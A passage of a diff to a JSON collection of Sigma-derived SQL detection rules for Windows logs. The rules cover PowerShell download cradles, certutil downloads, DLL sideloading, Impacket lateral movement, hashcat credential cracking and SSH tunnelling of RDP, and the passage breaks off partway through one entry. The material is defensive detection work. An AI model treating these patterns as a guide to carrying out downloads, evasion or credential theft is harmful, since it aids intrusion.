'%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\'))" ], - "filename": "image_load_uipromptforcreds_dlls.yml" + "filename": "proc_creation_win_winget_add_custom_source.yml" }, { - "title": "Potential Antivirus Software DLL Sideloading", - "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_antivirus.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], + "title": "PowerShell Web Download", + "id": "6e897651-f157-4d8f-aaeb-df8151488385", + "status": "experimental", + "description": "Detects suspicious ways to download files or content using PowerShell", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Very likely, needs more tuning" + "Scripts or tools that download files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_powershell_download_cradles.yml" }, { - "title": "WMIC Loading Scripting Libraries", - "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "status": "test", - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", - "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "Write Protect For Storage Disabled", - "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", - "status": "experimental", - "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", - "author": "Sreeman", + "title": "Defrag Deactivation", + "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "status": "test", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.persistence", + "attack.t1053.005", + "attack.s0111" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" + "filename": "proc_creation_win_apt_slingshot.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "PowerShell Script Run in AppData", - "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "title": "Suspicious Scheduled Task Name As GUID", + "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "status": "experimental", - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects creation of a scheduled task with a GUID like name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Administrative scripts" + "Legitimate software naming their tasks as GUIDs" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" + "filename": "proc_creation_win_schtasks_guid_task_name.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", - "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Download Via Certutil.EXE", + "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", + "status": "test", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1027" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((OriginalFileName = '3CXDesktopApp.exe' OR NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 